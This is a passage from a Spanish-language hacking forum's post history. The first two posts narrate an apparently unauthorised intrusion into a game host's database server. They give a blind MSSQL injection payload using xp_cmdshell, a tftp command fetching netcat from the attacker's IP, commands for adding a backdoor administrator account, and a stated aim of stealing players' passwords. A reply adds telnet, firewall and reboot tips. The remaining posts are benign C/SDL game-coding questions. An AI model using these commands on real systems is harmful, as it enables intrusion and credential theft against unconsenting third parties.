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51  Seguridad Informática / Nivel Web / Re: Alcanse con blind mssql inject , (comando shellcmd). en: 2 Abril 2013, 22:08 pm
Hola , muchas gracias por responder , se puede ejecutar comandos desde la shell con el comando que deje allí arriba esta 100% comprobado .
Le hice un tskill a un proceso que corre el juego que ellos tienen y se cerro  , varias veces hice esa comprobación, no pude crear un usuario para conectarme mediante escritorio remoto , segui una guia que lei aca en el foro , de un usuario que explicaba cual era la forma de crear un usuario y abilitarlo con permisos administrador e escritorio remoto ,la segui y no funciono quisas escribio mal el usuario los comandos , o el servidor que intento acceder no lo permite .

Lo hice en base a lo que escribio kamsky en el post : http://foro.elhacker.net/hacking_basico/acceso_remoto_habilitarlo_por_cmd-t275703.0.html

net user panter panter /add
net localgroup Administradores panter /add
net localgroup "Usuarios de escritorio remoto" panter /add

Probe agregarlo de diferentes formas al ver que esta primera no funcionaba , como por ejemplo sacarle el /add al segundo comando y al 3ero.
tambien , probe sacarle un panter al primero y sacarle el add a los otros 2 comandos, sin embargo no pude acceder remotamente al host.

No se de que forma seria para escribir una regla al firewall para poder utilizar telnet, si alguien podría ayudarme se lo agradeceria mucho.
No pido que me solucionen mi problema , si no que me digan que posiblidades tengo de acceder a la pc , necesito solo 5 minutos dentro del host para poder ejecutar una sentencia trans-sql dentro de su query analizer para imprimir en pantalla los usuarios y contraseñas de los jugadores y hacerme con ellos.

Y si intentas habilitar escritorio remoto y agregar un usuario nuevo para acceder?
Igual todo depende de los permisos que se le haya dado a la ejecución del motor MSSQL.

Recuerda tambien que desde windows server 2007 y Windows 7 ya no viene habilitado con tftp ni telnet, esas herramientas ahora vienen deshabilitadas por defecto, lo que si puedes hacer es desde la consola habilitar el servidor telnet y desde el comando reg add agregar una regla al firewall, pero como te digo, todo depende de los permisos que tenga la base de datos.

Haz la prueba y hazle un reboot con shutdown -r jajajaja si se reinicia es porque tienes permisos suficientes para trollear un buén rato xD y si no se reinicia entonces no podrás hacer mucho ya que significa que solo tienes permisos locales aunque de todas formas puedes hacer muchas cosas como tratar de que te escriba un archivo con la version del sistema operativo y despues leerlo con select * from openrowset(bulk N'C:\...temp\so.txt', SINGLE_BLOB)

Suerte! y nos cuentas como te fue o si tienes alguna duda.

Saludos.

Como podria ver sus directorios y descargarme archivos que tengan ellos ?? , sabiendo que es una inyeccion a siegas , y puedo ejecutar comandos,pero no puedo hacer que un select me devuelva datos, me los puede devolver, pero no los puedo imprimir en pantalla.


Otra cosa, es posible que ellos hayan configurado el firewall para recivir conexiones de escritorio remoto solo desde una ip? , porque antes me dejaba entrar por lo menos a verificar los datos,ahora no me conecta el escritorio remoto . y el nmap no me tira resultados de scaneo de esa ip.

Un saludo y muchas gracias por responder WHK.
52  Seguridad Informática / Nivel Web / Alcanse con blind mssql inject , (comando shellcmd). en: 30 Marzo 2013, 23:28 pm
Buenas, la cuestion viene por la siguiente mano .

Tengo una web vulnerable a mssql inject, donde puedo ejecutar un comando por vez


'x' ; EXEC master.dbo.xp_cmdshell 'COMANDO MSDOS' --

La web esta hosteada en linux,pero el comando va a una base de datos que esta alojada en un servidor Microsoft Windows server 2003 q no tiene un apache como para subirle un archivo php y podes usar una shell,simplemente es un servidor, y queria subirle un archivo de alguna forma un netcat o un troyano lo que sea para poder manipularlo , cuando intente subir un archivo por tftp , levante un sv tftp en mi pc , y se ve que no tiene activado en ese windows server 2003 el tftp ,porque no puede enviarle el archivo .

hice una cosa asi.

'x' ; EXEC master.dbo.xp_cmdshell 'tftp -i miip Get nc.exe %systemroot%/system32/nc.exe ' --

y no pude mandarselo , alguien sabe que otra forma puedo utilizar para subirle un archivo al servidor, teniendo en cuenta que puedo ejecutar solamente un comando por ves en el servidor.?
O un archivo .bat que me de shell remota ?.
probe tambien crear un usuario ,darle privilegios administradores y escritorio remoto ,pero no funciono tampoco . quisas solo tenga acceso desde la cuenta administrador de windows a la pc, es un host que se paga para tenerlo como servicio.

Saludos gracias por leer :)
53  Programación / Programación C/C++ / Re: Duda juego 3D en OpenGl en: 24 Marzo 2013, 23:09 pm
No entendi muy bien .pero si tienes cordenadas 0,0,0 en el medio de la superficie principal vas a tener que manejar valores negativos, para la izquierda del plano..

si lo ubicas en el segundo cuadrante , quisas resulte mas facil.. si no es lo q preguntas explicate mejor.
54  Programación / Programación C/C++ / Re: Graficos 3D con SDL. en: 17 Marzo 2013, 22:43 pm
Si ,respondio a mi pregunta, esta bien eso sirve para los rectangulos no más ,ahora si yo quiero representar cualquier otra figura, yo parto de un volumen(algo tridimencional) expresado como un o un array con 3 indices , que pasaría si quiero representar cualquier otra volumen que no sea rectangular...

muchas gracias puntoinfinito
55  Programación / Programación C/C++ / Re: Graficos 3D con SDL. en: 17 Marzo 2013, 18:30 pm
Se puede, solo necesito simular la profundidad
56  Programación / Programación C/C++ / Graficos 3D con SDL. en: 16 Marzo 2013, 22:45 pm
Hola.. vengo con una pregunta a ver si alguien de ustedes me hace el favor de asesorarme un poco , como puedo representar un cubo en SDL, suponiendo que dispongo de rectangulos ..

Como puedo simular la profundidad para varios angulos de observacion de una figura..
???
Gracias de antemano ..
57  Programación / Programación C/C++ / Re: Problema semicirculo para realizar un salto en video juego. en: 14 Marzo 2013, 17:17 pm
muchas gracias..ya lo resolvi ...

Código:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <SDL/SDL.h>
#define ANCHO 400
#define LARGO 400

//Variables globales
SDL_Surface *superficie,*icono; //Superficie principal.
SDL_Rect cuadrado,suelo; //Rectangulos
SDL_Event userevent; //Para registrar los eventos del usuario.
int cds=10*35; //Cordenadas del suelo
int bandera=0; //Esta bandera indica , si el salto se pudo realizar o no.


//--
//Prototipos
void modtam(SDL_Rect *,int , int); //Prototipo de la funcion modtam , que cambia el tamaño de un rect.Ancho y alto.
void modcor(SDL_Rect *,int , int);  //Prototipo de funcion que cambia las cordenadas de un rectangulo.
void sueloo(SDL_Rect *,int); //Prototipo de funcion , que crea el suelo.
void moverd(SDL_Rect *);
void moveri(SDL_Rect *) ; //Mueve el personaje o cuadrado en el eje x.( Simulacion de la accion caminar)(hacia la izquierda);
void restaurar(SDL_Surface *,SDL_Rect *,int ); //Restaura fondo original.
void salto(SDL_Rect *);
void salto2(SDL_Rect *);
// --




int main (int argc, char *argv[])
{
   
    //Inicio de sistemas, creacion de superficie principal,cambio de titulo.
    //Carga de las imagenes.
SDL_Init(SDL_INIT_VIDEO);
superficie=SDL_SetVideoMode(ANCHO,LARGO,24,0);
SDL_WM_SetCaption("Salto",NULL);

//



//Codigo general
//Crea el suelo,ajusta el tamaño del cuadrado(objeto), pone objetos en pantalla.
sueloo(&suelo,cds);
modtam(&cuadrado,10,10);
modcor(&cuadrado,1,cds-10);

//--------
//Variable que indica el final del programa
int final=1;
//--

//Comienza lectura de eventos..

do
{
      while (SDL_PollEvent(&userevent)) //Mientras aya eventos por parte del usuario -->
    {
           
           
           
            //Cambiamos el valor de final, si se registra el evento de cierre de pantalla.
            if(userevent.type==SDL_QUIT)final=0; //Cuando se lee el evento de cierre de ventana ( se cierra)
            if(userevent.type==SDL_KEYDOWN)
            {
            restaurar(superficie,&suelo,cds);
             if(userevent.key.keysym.sym==SDLK_RIGHT)moverd(&cuadrado);
             if(userevent.key.keysym.sym==SDLK_LEFT)moveri(&cuadrado);
             if(userevent.key.keysym.sym==SDLK_SPACE)salto(&cuadrado);
             if(userevent.key.keysym.sym==SDLK_d)salto(&cuadrado); //Salto hacia la derecha
             if(userevent.key.keysym.sym==SDLK_a)salto2(&cuadrado); //Salto hacia la izquierda
             }
             }
                                       
           
           
           
           
           
           
           
           
   
           
            SDL_Flip(superficie);
           
           
            }while(final);  //Mientras final sea igual a 1 se repite..






//Finaliza lecturas de eventos..





//Final del programa..


    return 0;
}
//





















//Codigo de las funciones..

//Modifica las cordenadas de un rectangulo.
void modcor(SDL_Rect *rectangulo,int x , int y) //Ver prototipo.
{
     rectangulo->x=x;
     rectangulo->y=y;
     SDL_FillRect(superficie,rectangulo,0xFF0000);
     
 }
 
 //Crea el suelo ( piso ) .
 void sueloo(SDL_Rect *rectangulo,int cds) //Ver prototipo
 {
      rectangulo->w=1;
      rectangulo->h=1;
      rectangulo->y=cds;
      for(int i=0;i<400;i++)
{
 rectangulo->x=i;       
SDL_FillRect(superficie,rectangulo,0xFFFFFF);
}
     
  }
 
  //Modifica el tamaño de un rectangulo.
  void modtam(SDL_Rect *rectangulo,int w, int h) //Ver prototipo.
 
  {
       rectangulo->w=w;
       rectangulo->h=h;
       
   }
   
   
   
   
   //Mueve un rectango..
 void moverd(SDL_Rect *personaje) // Ver prototipo
  {
      if(personaje->x<390)personaje->x+=10;
      SDL_FillRect(superficie,personaje,0xFF0000);
      SDL_Flip(superficie);
  }
 
 
 
  void moveri(SDL_Rect *personaje) // Ver prototipo
{
             if(personaje->x>10)personaje->x-=10;
      SDL_FillRect(superficie,personaje,0xFF0000);
      SDL_Flip(superficie);
  }
 
 
 
 
 
 
 
 
 
  //Restaura la superficie prinicipal
  void restaurar(SDL_Surface *superficie,SDL_Rect *rectangulo,int cds)
  {
       superficie=SDL_SetVideoMode(ANCHO,LARGO,24,NULL);
       sueloo(rectangulo,cds);
       SDL_Flip(superficie);
   }
   
   
   
   
   //Salto             -CORREGIR BUGUEADO.-
   
   
   
   
   void salto(SDL_Rect *personaje)
  {

                if(personaje->x>390 - (14 *8))
                {
                    bandera=1;
                    SDL_Delay(50);
                  SDL_FillRect(superficie,personaje,0xFF0000);
                  SDL_Flip(superficie);
                }
                else
                {
                     
                for(int i=7;i>0;i--)
                      {                       
                restaurar(superficie,&suelo,cds);
                personaje->y-=10;
                personaje->x+=8;
                SDL_FillRect(superficie,personaje,0xFF0000);
             
                   SDL_Flip(superficie);

                   
                }
                }
               
               
                if(bandera==0)
                {
                              if(personaje->x<390-7*8)
                 for(int i=0;i<7;i++)
     {
                 restaurar(superficie,&suelo,cds);
             personaje->y+=10;
             personaje->x+=8;
              SDL_FillRect(superficie,personaje,0xFF0000);
             SDL_Flip(superficie);

           
             
             }
             }else
             {
             
                  SDL_FillRect(superficie,personaje,0xFF0000);
                  SDL_Flip(superficie);
             
             }
             bandera=0;
             }
       



void salto2(SDL_Rect *personaje)
{
     
                if(personaje->x<1+14*8)
               
               
                {
                   
                 
                    bandera=1;
               
                  SDL_FillRect(superficie,personaje,0xFF0000);
                  SDL_Flip(superficie);
                }
                else
                {
                for(int i=7;i>0;i--)
                            {
                                       
                                      restaurar(superficie,&suelo,cds);
                                      personaje->y-=10;
                personaje->x-=8;
                SDL_FillRect(superficie,personaje,0xFF0000);
             
                   SDL_Flip(superficie);
                   
                }
                }
               
               
                if(bandera==0)
                {
                            // if(personaje->x<1+7*8)
                 for(int i=0;i<7;i++)
     {
                 restaurar(superficie,&suelo,cds);
             personaje->y+=10;
             personaje->x-=8;
              SDL_FillRect(superficie,personaje,0xFF0000);
             SDL_Flip(superficie);
           
             }
             }else
             {
             
                  SDL_FillRect(superficie,personaje,0xFF0000);
                  SDL_Flip(superficie);
             
             }
             bandera=0;
             }
       


saludos..
58  Programación / Programación C/C++ / Re: Problema semicirculo para realizar un salto en video juego. en: 14 Marzo 2013, 05:51 am
Muchas gracias ... jaja .. lo pude hacer al programa del "saltito" , pero resulta que esta medio bugueado y todavia no encuentro el error del bug, aca dejo el codigo fuente por si a alguien le sobra el tiempo y esta interesado en revisarlo ..

gracias de antemano..

Código
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <SDL/SDL.h>
  5. #define ANCHO 400
  6. #define LARGO 400
  7.  
  8. //Variables globales
  9. SDL_Surface *superficie,*icono; //Superficie principal.
  10. SDL_Rect cuadrado,suelo; //Rectangulos
  11. SDL_Event userevent; //Para registrar los eventos del usuario.
  12. int cds=10*35; //Cordenadas del suelo
  13. int bandera=0; //Esta bandera indica , si el salto se pudo realizar o no.
  14.  
  15.  
  16. //--
  17. //Prototipos
  18. void modtam(SDL_Rect *,int , int); //Prototipo de la funcion modtam , que cambia el tamaño de un rect.Ancho y alto.
  19. void modcor(SDL_Rect *,int , int);  //Prototipo de funcion que cambia las cordenadas de un rectangulo.
  20. void sueloo(SDL_Rect *,int); //Prototipo de funcion , que crea el suelo.
  21. void moverd(SDL_Rect *);//Mueve el personaje o cuadrado en el eje x.( Simulacion de la accion caminar)(hacia la derecha);
  22. void moveri(SDL_Rect *) ; //Mueve el personaje o cuadrado en el eje x.( Simulacion de la accion caminar)(hacia la izquierda);
  23. void restaurar(SDL_Surface *,SDL_Rect *,int ); //Restaura fondo original.
  24. void salto(SDL_Rect *);
  25. void salto2(SDL_Rect *);
  26. // --
  27.  
  28.  
  29.  
  30.  
  31. int main (int argc, char *argv[])
  32. {
  33.  
  34.    //Inicio de sistemas, creacion de superficie principal,cambio de titulo.
  35.    //Carga de las imagenes.
  36. SDL_Init(SDL_INIT_VIDEO);
  37. superficie=SDL_SetVideoMode(ANCHO,LARGO,24,0);
  38. SDL_WM_SetCaption("Salto",NULL);
  39.  
  40. //
  41.  
  42.  
  43.  
  44. //Codigo general
  45. //Crea el suelo,ajusta el tamaño del cuadrado(objeto), pone objetos en pantalla.
  46. sueloo(&suelo,cds);
  47. modtam(&cuadrado,10,10);
  48. modcor(&cuadrado,1,cds-10);
  49. SDL_Flip(superficie);
  50. //--------
  51. //Variable que indica el final del programa
  52. int final=1;
  53. //--
  54.  
  55. //Comienza lectura de eventos..
  56.  
  57. do
  58. {
  59.      while (SDL_PollEvent(&userevent)) //Mientras aya eventos por parte del usuario -->
  60.    {
  61.  
  62.  
  63.  
  64.            //Cambiamos el valor de final, si se registra el evento de cierre de pantalla.
  65.            if(userevent.type==SDL_QUIT)final=0; //Cuando se lee el evento de cierre de ventana ( se cierra)
  66.            if(userevent.type==SDL_KEYDOWN)
  67.            {
  68.            restaurar(superficie,&suelo,cds);
  69.             if(userevent.key.keysym.sym==SDLK_RIGHT)moverd(&cuadrado); //mueve hacia la derecha el cuadrado
  70.             if(userevent.key.keysym.sym==SDLK_LEFT)moveri(&cuadrado); //mueve hacia la izquierda el cuadrado
  71.             if(userevent.key.keysym.sym==SDLK_SPACE)salto(&cuadrado);
  72.             if(userevent.key.keysym.sym==SDLK_d)salto(&cuadrado); //Salto hacia la derecha
  73.             if(userevent.key.keysym.sym==SDLK_a)salto2(&cuadrado); //Salto hacia la izquierda
  74.             }
  75.             }
  76.  
  77.  
  78.  
  79.            }while(final);  //Mientras final sea igual a 1 se repite..
  80.  
  81.  
  82.  
  83.  
  84.  
  85.  
  86. //Finaliza lecturas de eventos..
  87.  
  88.  
  89.  
  90.  
  91.  
  92. //Final del programa..
  93.  
  94.  
  95.    return 0;
  96. }
  97. //
  98.  
  99.  
  100. //Codigo de las funciones..
  101.  
  102. //Modifica las cordenadas de un rectangulo.
  103. void modcor(SDL_Rect *rectangulo,int x , int y) //Ver prototipo.
  104. {
  105.     rectangulo->x=x;
  106.     rectangulo->y=y;
  107.     SDL_FillRect(superficie,rectangulo,0xFF0000);
  108.  
  109. }
  110.  
  111. //Crea el suelo ( piso ) .
  112. void sueloo(SDL_Rect *rectangulo,int cds) //Ver prototipo
  113. {
  114.      rectangulo->w=1;
  115.      rectangulo->h=1;
  116.      rectangulo->y=cds;
  117.      for(int i=0;i<400;i++)
  118. {
  119. rectangulo->x=i;      
  120. SDL_FillRect(superficie,rectangulo,0xFFFFFF);
  121. }
  122.  
  123.  }
  124.  
  125.  //Modifica el tamaño de un rectangulo.
  126.  void modtam(SDL_Rect *rectangulo,int w, int h) //Ver prototipo.
  127.  
  128.  {
  129.       rectangulo->w=w;
  130.       rectangulo->h=h;
  131.  
  132.   }
  133.  
  134.  
  135.  
  136.  
  137.   //Mueve un rectango..
  138. void moverd(SDL_Rect *personaje) // Ver prototipo
  139.  {
  140.      if(personaje->x<390)personaje->x+=10;
  141.      SDL_FillRect(superficie,personaje,0xFF0000);
  142.      SDL_Flip(superficie);
  143.  }
  144.  
  145.  
  146.  
  147.  void moveri(SDL_Rect *personaje) // Ver prototipo
  148. {
  149.             if(personaje->x>10)personaje->x-=10;
  150.      SDL_FillRect(superficie,personaje,0xFF0000);
  151.      SDL_Flip(superficie);
  152.  }
  153.  
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160.  
  161.  
  162.  //Restaura la superficie prinicipal
  163.  void restaurar(SDL_Surface *superficie,SDL_Rect *rectangulo,int cds)
  164.  {
  165.       superficie=SDL_SetVideoMode(ANCHO,LARGO,24,NULL);
  166.       sueloo(rectangulo,cds);
  167.       SDL_Flip(superficie);
  168.   }
  169.  
  170.  
  171.  
  172.  
  173.   //Salto             -CORREGIR BUGUEADO.-
  174.  
  175.  
  176.  
  177.  
  178.   void salto(SDL_Rect *personaje)
  179.  {
  180.        for(int i=7;i>0;i--)
  181.        {
  182.                if(personaje->x>390-7*8)
  183.  
  184.  
  185.                {
  186.  
  187.  
  188.                    bandera=1;
  189.                    SDL_Delay(50);
  190.                  SDL_FillRect(superficie,personaje,0xFF0000);
  191.                  SDL_Flip(superficie);
  192.                }
  193.                else
  194.                {
  195.  
  196.  
  197.                                      restaurar(superficie,&suelo,cds);
  198.                                      personaje->y-=10;
  199.                personaje->x+=8;
  200.                SDL_FillRect(superficie,personaje,0xFF0000);
  201.  
  202.                   SDL_Flip(superficie);
  203.                      SDL_Delay(50);
  204.  
  205.                }
  206.                }
  207.  
  208.  
  209.                if(bandera==0)
  210.                {
  211.                              if(personaje->x<390-7*8)
  212.                 for(int i=0;i<7;i++)
  213.     {
  214.                 restaurar(superficie,&suelo,cds);
  215.             personaje->y+=10;
  216.             personaje->x+=8;
  217.              SDL_FillRect(superficie,personaje,0xFF0000);
  218.             SDL_Flip(superficie);
  219.             SDL_Delay(50);
  220.  
  221.             }
  222.             }else
  223.             {
  224.  
  225.                  SDL_Delay(50);
  226.                  SDL_FillRect(superficie,personaje,0xFF0000);
  227.                  SDL_Flip(superficie);
  228.  
  229.             }
  230.             bandera=0;
  231.             }
  232.  
  233.  
  234.  
  235.  
  236. void salto2(SDL_Rect *personaje)
  237. {
  238.  
  239.        for(int i=7;i>0;i--)
  240.        {
  241.                if(personaje->x<1+7*8)
  242.  
  243.  
  244.                {
  245.  
  246.  
  247.                    bandera=1;
  248.                    SDL_Delay(50);
  249.                  SDL_FillRect(superficie,personaje,0xFF0000);
  250.                  SDL_Flip(superficie);
  251.                }
  252.                else
  253.                {
  254.  
  255.  
  256.                                      restaurar(superficie,&suelo,cds);
  257.                                      personaje->y-=10;
  258.                personaje->x-=8;
  259.                SDL_FillRect(superficie,personaje,0xFF0000);
  260.  
  261.                   SDL_Flip(superficie);
  262.                      SDL_Delay(50);
  263.  
  264.                }
  265.                }
  266.  
  267.  
  268.                if(bandera==0)
  269.                {
  270.                            // if(personaje->x<1+7*8)
  271.                 for(int i=0;i<7;i++)
  272.     {
  273.                 restaurar(superficie,&suelo,cds);
  274.             personaje->y+=10;
  275.             personaje->x-=8;
  276.              SDL_FillRect(superficie,personaje,0xFF0000);
  277.             SDL_Flip(superficie);
  278.             SDL_Delay(50);
  279.  
  280.             }
  281.             }else
  282.             {
  283.  
  284.                  SDL_Delay(50);
  285.                  SDL_FillRect(superficie,personaje,0xFF0000);
  286.                  SDL_Flip(superficie);
  287.  
  288.             }
  289.             bandera=0;
  290.             }
  291.  

El error se proboca en la funcion salto 1 y salto 2 , para cualquiera que lo compile se va a dar cuenta que puede saltar en las partes del eje, pero no en los extremos, cuando salta en los extremos la cordenada x se buguea y puedes saltar por toda la superficie. un saludo gracias a todos.


Cuando hago los saltos , sin moverme con las flechitas (right y left),salta correctamente y no salta de más ni de menos, pero cuando me muevo en las cordenadas con las fechas cuando realizo el salto se ve que se en parte del eje x se buguea, debe de ser porque escribi mal las comprobaciones de los saltos, ya que el salto va de 8 en x y 1 en 1 , esto repetido 7 veces para completar el salto y para la bajada va desde 8 en x y disminuyendo 1 en 1.


Gracias a todos , son muy amables.
59  Programación / Programación C/C++ / Problema semicirculo para realizar un salto en video juego. en: 14 Marzo 2013, 00:07 am
Estoy estudiando SDL, y tenia pensado hacer un juego ,pero todavia no me llevo muy bien con las cordenadas.

Con SDL creo una superficie principal de por ejemplo 400(ancho) x 400(largo) , cuadrada.

Quiero hacer un salto , osea que si el personaje salta tiene que formar un semicirculo dentro del eje.

Suponiendo que el salto arranca del 1 en x , y llega a 10 en x , en 5 de x tendria que estar el punto más alto del salto , que luego disminueria a medida que valla avanzando.. osea, en 5 de x , Y disminueria hasta llegar a 10 de ex . siendo y 0 para el entonces. ( En el piso ).

Mientras y aumenta hasta 5 de x, dismunuye en semetria ..

Hay algun patron , o formula para hacer un semicirculo en el salto , osea que valla aumentando en forma de parabola hasta llegar a 5 de x y dismuir en forma de parabola hasta llegar a 10 de x ?..

QUIERO HACER UN MOVIMIENTO ASI..


Gracias de antemano y un saludo.
60  Foros Generales / Foro Libre / Re: Novelas de Hackers, Programadores, Informáticos... en: 24 Febrero 2013, 01:55 am
muy bueno muchas gracias , voy a leer
La estancia Azul - Jeffery Deaver
saludos.
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